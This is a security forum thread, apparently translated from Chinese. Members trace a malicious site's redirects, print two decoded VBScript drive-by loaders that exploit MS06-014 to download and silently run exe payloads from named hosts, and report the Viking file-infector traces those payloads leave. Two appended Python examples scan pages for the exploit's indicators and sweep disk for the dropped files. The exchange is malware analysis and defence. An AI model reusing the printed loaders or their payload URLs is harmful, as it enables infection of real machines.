Rising Kaka Security Forum, Technical Exchange, Anti-virus / Anti-rogue-software board: My computer got infected after visiting this URL; even genuine Rising can't remove it. Hoping a moderator can help me


My computer got infected after visiting this URL; even genuine Rising can't remove it. Hoping a moderator can help me

It shouldn't be a false positive..

Guys, I'm decoding the script, hold on..

I went and looked too; the source definitely has something wrong with it, it's not a false positive. Let's wait for mod M to decode it : )

The real site is hXXp://3w.ycdy.com/cfad/0002.htm, but that page itself is fine; it redirects to hXXp://3w.ycdy.com/cfad/0001.htm

and from hXXp://3w.ycdy.com/cfad/0001.htm it keeps redirecting

I'm furious... a pointless bit of JS wasted a huge amount of my time

After a big detour it comes back to the original page, http://www1.ycdy.com/demo/mm.htm, this one:
<script language="VBScript">

on error resume next

MircoLong = "http://www1.ycdy.com/demo/cha0.exe"

    m4="down"
    m5="file"
    m6="copy"
    m7="exit"
    Set MircoLongc = document.createElement("object")
    MircoLongc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    seturla=m4
    seturlb=m5
    seturlc=m6
    seturld=m7
    MircoLongi="Microsoft.XMLHTTP"
    Set MircoLongd = MircoLongc.CreateObject(MircoLongi,"")
    seturlf="Ado"
    seturlg="db."
    seturlh="Str"
    seturli="eam"
    MircoLongf=seturlf&seturlg&seturlh&seturli
    MircoLongg=MircoLongf
    set MircoLonga = MircoLongc.createobject(MircoLongg,"")
    MircoLonga.type = 1
    MircoLongh="GET"
    MircoLongd.Open MircoLongh, MircoLong, False
    MircoLongd.Send
    MircoLong9="svchost.exe"
    set MircoLongb = MircoLongc.createobject("Scripting.FileSystemObject","")
    set MircoLonge = MircoLongb.GetSpecialFolder(2)
    MircoLonga.open
    MircoLong8="MircoLonga.BuildPath(MircoLonga,MircoLong8)"
    MircoLong7="MircoLongb.BuildPath(MircoLongb,MircoLong7)"
    MircoLong6="MircoLongc.BuildPath(MircoLongd,MircoLong6)"
    MircoLong5="MircoLongd.BuildPath(MircoLongf,MircoLong5)"
    MircoLong4="MircoLonge.BuildPath(MircoLongg,MircoLong4)"
    MircoLong3="MircoLongf.BuildPath(MircoLongh,MircoLong4)"
    MircoLong2="MircoLongg.BuildPath(MircoLongi,MircoLong3)"
    MircoLong1="MircoLongh.BuildPath(MircoLongg,MircoLong1)"
    MircoLong0="MircoLongi.BuildPath(MircoLongk,MircoLong0)"
    MircoLong9= MircoLongb.BuildPath(MircoLonge,MircoLong9)
    MircoLonga.write MircoLongd.responseBody
    MircoLonga.savetofile MircoLong9,2
    MircoLonga.close
    set MircoLonge = MircoLongc.createobject("Shell.Application","")
    MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0


</script>



The second one, http://60.190.222.233/wm/ip2.htm, after decoding:

<html>
<script language="VBScript">
on error resume next
MyQQ5372453="http://60.190.222.233/wm/xia.exe"
Set CAOc = document.createElement("object")
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, MyQQ5372453, False
CAOd.Send
CAO9="xia.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0
</script>
</html>


M would never do work this tedious; hard labour like this gets left to me. I hope he does lots of virus testing, haha. My writing skills are poor, I can't write the analysis

Definitely not a false positive, just look at these 2 scripts: the first downloads http://www1.ycdy.com/demo/cha0.exe, the second downloads http://60.190.222.233/wm/xia.exe. Both exploit the MS06-14 vulnerability.... As long as you've applied the patch you won't get infected.. I'll download them and take a closer look
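Both decoded scripts above build the same download-and-execute chain on top of MS06-014 (the MDAC RDS.DataSpace bug, written "MS06-14" in the post): instantiate RDS.DataSpace by its CLSID, use it to create Microsoft.XMLHTTP to fetch the payload, ADODB.Stream to write it to the temp folder, and Shell.Application to run it. The only obfuscation is that the CLSID and the "Adodb.Stream" ProgID are split into short string variables and glued back together with `+` or `&`, which is enough to defeat a naive substring match. The scanner below, an added example that is not from the thread, folds those concatenations back together before matching on the indicators the posts name. `SAMPLE_PAGE` is a constructed fragment modelled on the second script (the URLs and the dropped file name are left out), and `BENIGN_PAGE` is a constructed control; the indicator labels are my own.

```python
import re

# Constructed sample modelled on the obfuscated VBScript loader in the thread:
# the RDS.DataSpace CLSID and the "Adodb.Stream" ProgID are split across
# several string variables and reassembled with + / & at runtime.
SAMPLE_PAGE = '''<html>
<script language="VBScript">
on error resume next
Set CAOc = document.createElement("object")
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
CAOi="Microsoft.XMLHTTP"
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0
</script>
</html>'''

# Constructed benign control page: ordinary string concatenation, no ActiveX.
BENIGN_PAGE = '''<html><script language="VBScript">
greeting = "Hello, " & "world"
MsgBox greeting
</script></html>'''

# Components the MS06-014 download-and-execute chain relies on (all appear in
# the thread's scripts). Keys are labels, values are lower-cased needles.
INDICATORS = {
    "RDS.DataSpace CLSID (MS06-014)": "bd96c556-65a3-11d0-983a-00c04fc29e36",
    "ADODB.Stream (writes payload to disk)": "adodb.stream",
    "Microsoft.XMLHTTP (fetches payload)": "microsoft.xmlhttp",
    "Shell.Application (runs dropped file)": "shell.application",
    "ShellExecute call": "shellexecute",
}

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
STRING_RE = re.compile(r'"([^"]*)"')
TERM = r'(?:"[^"]*"|[A-Za-z_]\w*)'
CONCAT_RE = re.compile(TERM + r'(?:\s*[&+]\s*' + TERM + r')*')


def fold(expr: str, env: dict):
    """Evaluate a VBScript concatenation of string literals and already-known
    variables. Returns None if any term is unknown. Literals that themselves
    contain & or + are not handled (none occur in the thread's scripts)."""
    value = ""
    for part in re.split(r'\s*[&+]\s*', expr.strip()):
        lit = STRING_RE.fullmatch(part)
        if lit:
            value += lit.group(1)
        elif part in env:
            value += env[part]
        else:
            return None
    return value


def deobfuscate(script: str):
    """One top-to-bottom pass: record every resolvable string assignment, then
    fold each concatenation expression on the line, including ones passed
    inline as arguments (c1+c2+c3+c4). Returns (env, derived strings)."""
    env, derived = {}, []
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            v = fold(m.group(2), env)
            if v is not None:
                env[m.group(1)] = v
        for cm in CONCAT_RE.finditer(line):
            v = fold(cm.group(0), env)
            if v is not None:
                derived.append(v)
    return env, derived


def scan_page(html: str):
    """Sorted labels of every indicator found in the raw page text or in the
    strings recovered by deobfuscate()."""
    _env, derived = deobfuscate(html)
    haystack = "\n".join([html] + derived).lower()
    return sorted(label for label, needle in INDICATORS.items() if needle in haystack)


if __name__ == "__main__":
    for label in scan_page(SAMPLE_PAGE):
        print("HIT:", label)
```

The single pass is deliberately simple: it resolves only assignments that can be evaluated from earlier lines, so a loader that builds strings with `Chr()` or `Mid()` would slip past it. For pages like the two in this thread that is enough, and the same fold step can be dropped in front of any rule that matches on CLSIDs or ProgIDs in cached web content.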

Downloaded and ran them. The first, http://www1.ycdy.com/demo/cha0.exe,
generates Viking's LOGO1_.EXE and a whole pile of other stuff, infects every exe file, turning them into ***.exe.Exe

The second, http://60.190.222.233/wm/xia.exe, produces C:\WINDOWS\uninstall\rundl132.exe and C:\WINDOWS\RichDll.dll; it also looks like Viking

It connects to the network; I suspect it's a DL (downloader)... a whole pile of stuff
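The post above gives the host-side artefacts of the two payloads: Viking's LOGO1_.EXE, the renamed originals ending in .exe.Exe, and the dropped rundl132.exe / RichDll.dll. Those names are enough for a quick triage sweep of a suspect machine or a mounted image. The script below is an added example, not from the thread: it walks a directory tree and reports files whose name matches one of the reported artefacts or carries the double .exe extension left on the renamed originals. `build_sample_tree()` creates a constructed layout of empty placeholder files mirroring the paths the post names, so it runs offline on any platform.

```python
import os
import tempfile

# File names the thread reports as artefacts of the two payloads.
# Matched case-insensitively; none of these are created by the sweep itself.
KNOWN_DROPPED = {"logo1_.exe", "rundl132.exe", "richdll.dll"}


def classify(filename: str):
    """Return a finding label for one file name, or None if it looks clean."""
    low = filename.lower()
    if low in KNOWN_DROPPED:
        return "known dropped file"
    # The post reports infected programs being renamed to <name>.exe.Exe;
    # a doubled .exe extension is the cheap name-based indicator for that.
    if low.endswith(".exe.exe"):
        return "double-extension executable (renamed original)"
    return None


def sweep(root: str):
    """Walk root and return sorted (relative path, label) pairs for each hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            label = classify(name)
            if label:
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                hits.append((rel.replace(os.sep, "/"), label))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed directory layout mirroring the paths named in the thread.
    Every file is an empty placeholder; nothing here is real malware."""
    root = tempfile.mkdtemp(prefix="viking_sweep_demo_")
    for rel in [
        "WINDOWS/uninstall/rundl132.exe",
        "WINDOWS/RichDll.dll",
        "WINDOWS/notepad.exe",            # clean system file
        "Program Files/App/LOGO1_.EXE",
        "Program Files/App/app.exe",      # infected in-place copy: same name, not caught by name alone
        "Program Files/App/app.exe.Exe",  # renamed original
        "Users/me/notes.txt",
    ]:
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "wb").close()
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for path, label in sweep(demo_root):
        print(f"{label:48} {path}")
```

The deliberate gap in the constructed tree is `app.exe`: a file infector overwrites the program under its original name, so a name-only sweep finds the renamed copy beside it but not the infected one. Treat any directory with a `<name>.exe.Exe` hit as having a compromised `<name>.exe` too, and confirm with hashes or an AV scan rather than by name.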

The OP isn't around... ugh.. call it a review session then